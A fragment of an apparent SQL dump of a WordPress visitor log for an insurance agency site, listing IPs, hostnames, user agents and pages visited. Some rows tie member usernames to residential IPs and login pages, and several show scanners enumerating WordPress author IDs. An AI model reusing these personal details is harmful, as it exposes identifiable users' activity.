1080','','','','','','3','0',0),(27584,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913401','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','0',0),(27587,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913420','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','0',0),(27588,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913626','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/?page_id=171','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','171',0),(27590,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913628','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','51',0),(27593,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913652','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','51',0),(27596,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913691','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 50','us','1920 x 1080','','','','madler','','3','51',0),(27597,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913699','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/members/?a=edit','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','madler','','3','51',0),(27600,'0b_e13ef9102949ed1c491ff6b4d827a14f','1462913711','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(27603,'0b_e13ef9102949ed1c491ff6b4d827a14f','1462913712','68.180.230.123','b115363.yse.yahoo.net','/igo/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(27605,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913732','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/members/?a=edit','',0,'Win7','Chrome 50','us','1920 x 1080','','','','madler','','3','51',0),(27608,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913733','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','madler','','3','0',0),(27611,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913740','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','madler','','3','51',0),(27612,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913849','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','0',0),(27614,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913852','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','0',0),(27617,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913858','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','0',0),(27620,'0b_b969cb79cf1542c9d394d92c340542df','1462913871','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','','','','','madler','','0','0',0),(27621,'0b_6bbbec9f607f1ee1ac135451cefe82fc','1462914052','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','0',0),(27624,'0b_6bbbec9f607f1ee1ac135451cefe82fc','1462914053','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','0',0),(27626,'0b_6bbbec9f607f1ee1ac135451cefe82fc','1462914060','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','0',0),(27629,'0b_6bbbec9f607f1ee1ac135451cefe82fc','1462914105','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','51',0),(27630,'0b_b969cb79cf1542c9d394d92c340542df','1462914298','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','madler','','0','0',0),(27633,'0b_b969cb79cf1542c9d394d92c340542df','1462914303','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','madler','','0','51',0),(27636,'0b_7fb15328d7423d252fd939e08bd04528','1462914532','91.200.12.53','dedic658.hidehost.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0','','',0,'MacOSX','Firefox 36','us','','','','','','','0','0',0),(27638,'0b_8dac50056120e5c61b1e276f2e8aa50c','1462914841','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(27641,'0b_f9bcffdcb3ad45e8d2a0d854349a118d','1462918034','180.76.15.146','baiduspider-180-76-15-146.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(27642,'0b_9263c8af4afe6507ee4a795c53728263','1462918516','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27645,'0b_9263c8af4afe6507ee4a795c53728263','1462918518','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27648,'0b_9263c8af4afe6507ee4a795c53728263','1462918521','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27651,'0b_9263c8af4afe6507ee4a795c53728263','1462918522','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27653,'0b_9263c8af4afe6507ee4a795c53728263','1462918548','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27654,'0b_e2753048ede0b5a0020f91434b19cc79','1462919646','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27657,'0b_141740288e0bf47853e906d3aef9fd93','1462920538','195.211.101.181','s1.tardishost.ru','/?author=0','','','',0,'','','ru','','','Unknown Spider','','','','0','0',0),(27660,'0b_141740288e0bf47853e906d3aef9fd93','1462920538','195.211.101.181','s1.tardishost.ru','/?author=1','','','',0,'','','ru','','','Unknown Spider','','','','0','0',0),(27663,'0b_141740288e0bf47853e906d3aef9fd93','1462920539','195.211.101.181','s1.tardishost.ru','/?author=4','','','',0,'','','ru','','','Unknown Spider','','','','0','0',0),(27666,'0b_d89b3f1af0b14356db1fa036a9b5d3cb','1462922317','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27669,'0b_0812309be5a8f29c77ee4ebb87a365fb','1462922589','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27671,'0b_ce8165719761c13bc7bc811c50f4aac1','1462925863','188.40.95.70','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(27674,'0b_ce8165719761c13bc7bc811c50f4aac1','1462925866','188.40.95.70','majestic12.co.uk','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(27675,'0b_9027399f5e3ea5cd4677a31783003585','1462926638','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27678,'0b_973a45f94e9e1b314afa88ce2b229428','1462928241','192.227.217.111','192-227-217-111-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(27681,'0b_8e44463c76c1f06494a5db08a275f9c0','1462928241','192.227.211.37','192-227-211-37-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(27683,'0b_526837cbb07e2f7b6039da1da32d1e15','1462928411','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27686,'0b_0c33a3ebd41c324d06813fcbe4aa5dfa','1462929261','180.76.15.138','baiduspider-180-76-15-138.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(27689,'0b_d058a609a7fa7f3d91193db6cf0bc381','1462931597','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(27692,'0b_d058a609a7fa7f3d91193db6cf0bc381','1462931600','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27695,'0b_d058a609a7fa7f3d91193db6cf0bc381','1462931606','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27698,'0b_ef83463bdb3d73d03adb1fb25a458b09','1462931948','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27699,'0b_ef83463bdb3d73d03adb1fb25a458b09','1462931950','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27701,'0b_ef83463bdb3d73d03adb1fb25a458b09','1462931958','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27704,'0b_d058a609a7fa7f3d91193db6cf0bc381','1462932376','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27707,'0b_ef83463bdb3d73d03adb1fb25a458b09','1462932380','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27710,'0b_d058a609a7fa7f3d91193db6cf0bc381','1462932381','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27711,'0b_ebb036296d0cc321a607cc8e650523eb','1462932957','169.54.233.120','78.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(27713,'0b_4e049bbe3475a4ee61921b1b5626bff2','1462933748','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27716,'0b_1e2df3811d0ac7c45eb23fe5b662b728','1462933952','123.125.71.51','baiduspider-123-125-71-51.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(27717,'0b_51cfc7f041b2ce02d9393037a45b0c08','1462933980','220.181.108.118','baiduspider-220-181-108-118.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(27720,'0b_dce6c9ddc8a500459f656d84164e6f8a','1462934013','123.125.67.154','123.125.67.154','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(27722,'0b_1b3f8f120e40b5cc38d2a4842b12b440','1462935210','192.171.18.102','mail.northbeaconroad.com','/','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.46 Safari/537.36','','',0,'WinVista','Chrome 33','','','','','','','','0','0',0),(27725,'0b_0f2974b0c22ff7b3c1665696fafd1ae7','1462935222','162.217.177.221','mail.crystalaccord.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 OPR/18.0.1284.68','','',0,'Win7','Google Chrome','','','','','','','','0','0',0),(27728,'0b_986c6677411206c285bec3f74c591bc4','1462935298','66.249.66.14','crawl-66-249-66-14.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(27729,'0b_edbc0ec6a3547cff26a720ed7b216538','1462937579','75.102.23.103','unknown.hostforweb.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(27732,'0b_ba780a3c8bdac6bf1223b45d45282991','1462937579','72.51.47.124','ns2.fullmidia.com.br','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','br','','','','','','','0','0',0),(27734,'0b_32472d792449241afef1e7bb0acba0c8','1462938815','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27735,'0b_c8f7e655bbbd3360417deb798bfeaf78','1462939383','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','0',0),(27738,'0b_c8f7e655bbbd3360417deb798bfeaf78','1462939383','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','0',0),(27741,'0b_c8f7e655bbbd3360417deb798bfeaf78','1462939385','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','0',0),(27744,'0b_c8f7e655bbbd3360417deb798bfeaf78','1462939413','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27747,'0b_c8f7e655bbbd3360417deb798bfeaf78','1462939428','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27750,'0b_b10ad893a5c04c41bfc967c59037e704','1462940063','189.48.122.93','189-48-122-93.user.veloxzone.com.br','/wp-admin/admin-ajax.php','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31','','',0,'Linux','Chrome 26','br','','','','','','','3','0',0),(27752,'0b_1c4a817d417e6b2dc9670d06e448540a','1462940532','51.254.97.22','22.ip-51-254-97.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(27755,'0b_1c4a817d417e6b2dc9670d06e448540a','1462940534','51.254.97.22','22.ip-51-254-97.eu','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(27758,'0b_5c19697dd84ea6d84d1c0f3bf33598ce','1462943089','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27759,'0b_2f32c24593f677ec3dd3766a0a245ca5','1462947215','192.3.120.16','192-3-120-16-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(27762,'0b_bb9936b71bb092ad1ed305d44254bde4','1462948540','54.205.94.132','ec2-54-205-94-132.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)','','',0,'WinVista','Firefox 3','us','','','','','','','0','0',0),(27764,'0b_d04acffe8fe679c0db3fc8416fb1b6f5','1462951254','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27767,'0b_c7f256b2eb23b777ef39490b34c3d0d0','1462951663','66.249.66.34','crawl-66-249-66-34.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27770,'0b_c7f256b2eb23b777ef39490b34c3d0d0','1462951665','66.249.66.34','crawl-66-249-66-34.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27771,'0b_c7f256b2eb23b777ef39490b34c3d0d0','1462951688','66.249.66.34','crawl-66-249-66-34.googlebot.com','/.well-known/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27774,'0b_b8781530830c6e830f6a215d72ef14be','1462951818','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27776,'0b_b8781530830c6e830f6a215d72ef14be','1462951827','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27779,'0b_b8781530830c6e830f6a215d72ef14be','1462951838','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27780,'0b_318c117b71f7f9fa7cf0a69ff4bd0534','1462952201','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)','http://empireins.com/?author=1','',0,'Win7','IE 9','cn','','','','','','','0','0',0),(27782,'0b_9626fa176a25e1ee89593a0e296f1adf','1462952203','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(27785,'0b_9626fa176a25e1ee89593a0e296f1adf','1462952205','91.200.12.26','huangdisisi0708.com','/author/admin/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(27786,'0b_9626fa176a25e1ee89593a0e296f1adf','1462952207','91.200.12.26','huangdisisi0708.com','/?author=2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(27789,'0b_9626fa176a25e1ee89593a0e296f1adf','1462952209','91.200.12.26','huangdisisi0708.com','/?author=3','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(27791,'0b_9626fa176a25e1ee89593a0e296f1adf','1462952211','91.200.12.26','huangdisisi0708.com','/?author=4','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(27794,'0b_9626fa176a25e1ee89593a0e296f1adf','1462952212','91.200.12.26','huangdisisi0708.com','/?author=5','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(27795,'0b_b469565f74887b0d8e073b651688011c','1462953998','72.51.47.124','ns2.fullmidia.com.br','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 